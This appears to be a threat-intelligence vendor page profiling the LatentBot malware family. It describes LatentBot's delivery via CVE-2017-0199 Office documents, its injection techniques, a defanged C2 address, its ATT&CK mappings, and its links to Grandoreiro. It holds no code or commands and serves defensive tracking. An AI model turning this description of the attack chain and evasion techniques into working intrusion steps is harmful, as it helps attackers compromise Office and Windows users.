MalwareExploits 1 CVE

LATENTBOT

LatentBot is a highly obfuscated modular malware family that has been in the wild since at least 2013. FireEye described it as using a modular plugin architecture and noted associations with Pony infostealer campaigns. It has been observed as a final payload delivered through malicious Microsoft Office RTF/Word documents exploiting CVE-2017-0199, where crafted documents used embedded OLE2 link objects to retrieve remote HTA/VBScript/PowerShell content via winword.exe and mshta.exe, terminate winword.exe to hide prompts, download additional stages, and open decoy documents. In one documented chain, the exploit downloaded components including maintenance.vbs, an obfuscated JavaScript stage, and a final executable (wood.exe) that was identified as a newer LatentBot variant. Reported LatentBot techniques include attrib.exe patching, svchost.exe code injection, SetThreadContext-based control transfer, and browser injection using ZwMapViewOfSection/NtMapViewOfSection. FireEye reported that the payload infrastructure changed during observation and that the LatentBot C2 moved to 217.12.203[.]100, though the server was offline at the time of analysis. Separately, Zscaler reported that newer Grandoreiro variants adopted a command-and-control communication pattern identical to LatentBot, specifically using "ACTION+HELLO" beacons and ID-based cookie value responses; similarities between Grandoreiro and LatentBot were first noted in 2020. U.S. government reporting also associated LatentBot with exploitation of CVE-2017-0199 affecting Microsoft Office and multiple Windows versions.

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial

EXPLOITED CVES

Vulnerabilities exploited

1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

1 CVES

CVE-2017-0199Microsoft Office/WordPad Remote Code Execution VulnerabilityExploited in the wild

CVE-2017-0199 ... Associated Malware: FINSPY, LATENTBOT, Dridex | CVE-2017-0199 Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1 Associated Malware: FINSPY, LATENTBOT, Dridex | CVE-2017-0199 Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1 Associated Malware: FINSPY, LATENTBOT, Dridex Mitigation: Update affected Microsoft products with the latest security patches

via cisa advisoriescisa.gov

MITRE ATT&CK

Techniques & procedures

4 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique

T1566.001Spearphishing AttachmentEvidence1

Malicious cyber actors most often exploited vulnerabilities in Microsoft’s Object Linking and Embedding (OLE) technology. | According to U.S. Government technical analysis, malicious cyber actors most often exploited vulnerabilities in Microsoft’s Object Linking and Embedding (OLE) technology. OLE allows documents to contain embedded content from other applications such as spreadsheets. | Malicious cyber actors most often exploited vulnerabilities in Microsoft’s Object Linking and Embedding (OLE) technology. OLE allows documents to contain embedded content from other applications such as spreadsheets.

Execution

1 technique

T1203Exploitation for Client ExecutionEvidence1

U.S. Government reporting has identified the top 10 most exploited vulnerabilities by state, nonstate, and unattributed cyber actors from 2016 to 2019 as follows: CVE-2017-11882, CVE-2017-0199, CVE-2017-5638, CVE-2012-0158, CVE-2019-0604, CVE-2017-0143, CVE-2018-4878, CVE-2017-8759, CVE-2015-1641, and CVE-2018-7600. | Malicious cyber actors most often exploited vulnerabilities in Microsoft’s Object Linking and Embedding (OLE) technology. OLE allows documents to contain embedded content from other applications such as spreadsheets. | U.S. Government reporting has identified the top 10 most exploited vulnerabilities by state, nonstate, and unattributed cyber actors from 2016 to 2019 as follows: CVE-2017-11882, CVE-2017-0199, CVE-2017-5638, CVE-2012-0158, CVE-2019-0604, CVE-2017-0143, CVE-2018-4878, CVE-2017-8759, CVE-2015-1641, and CVE-2018-7600. According to U.S. Government technical analysis, malicious cyber actors most often exploited vulnerabilities in Microsoft’s Object Linking and Embedding (OLE) technology. | U.S. Government reporting has identified the top 10 most exploited vulnerabilities by state, nonstate, and unattributed cyber actors from 2016 to 2019 as follows: CVE-2017-11882, CVE-2017-0199, CVE-2012-0158, CVE-2018-4878, CVE-2017-8759, and CVE-2015-1641. According to U.S. Government technical analysis, malicious cyber actors most often exploited vulnerabilities in Microsoft’s Object Linking and Embedding (OLE) technology. | U.S. Government reporting has identified the top 10 most exploited vulnerabilities... malicious cyber actors most often exploited vulnerabilities in Microsoft’s Object Linking and Embedding (OLE) technology... the three vulnerabilities used most frequently across state-sponsored cyber actors from China, Iran, North Korea, and Russia are CVE-2017-11882, CVE-2017-0199, and CVE-2012-0158.

Command and Control

2 techniques

T1071Application Layer ProtocolEvidence1

The C2 communication pattern is now identical to that of LatentBot, using "ACTION+HELLO" beacons and ID-based cookie value responses.

T1568.002Domain Generation AlgorithmsEvidence1

One of the new additions in the latest Grandoreiro variant sampled by Zscaler is the use of DGA (domain generation algorithm) for C2 communications, which makes mapping the malware's infrastructure and taking it down challenging.

INDICATORS OF COMPROMISE

IOCs tracked for this family

3 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app

Other

3 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting

uri●●●●●●●●●●●●View more in app6 years ago

ACTIVITY FEED

Recent activity

3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

3 SOURCESView more in app

bleeping computerNews

Aug 19, 2022

Grandoreiro banking malware targets manufacturers in Spain, Mexico

LatentBot is referenced as a malware strain whose C2 communication pattern and techniques were adopted by Grandoreiro.

web archiveNews

Apr 11, 2017

CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler " Threat Research Blog | FireEye Inc

Highly obfuscated bot with a modular plugin architecture; uses process injection (e.g., svchost and browser injection via section mapping APIs) and beacons to C2. Has been associated with “Pony” infostealer campaigns.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.

Start free trial

IOC matching3

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities1

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping4

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.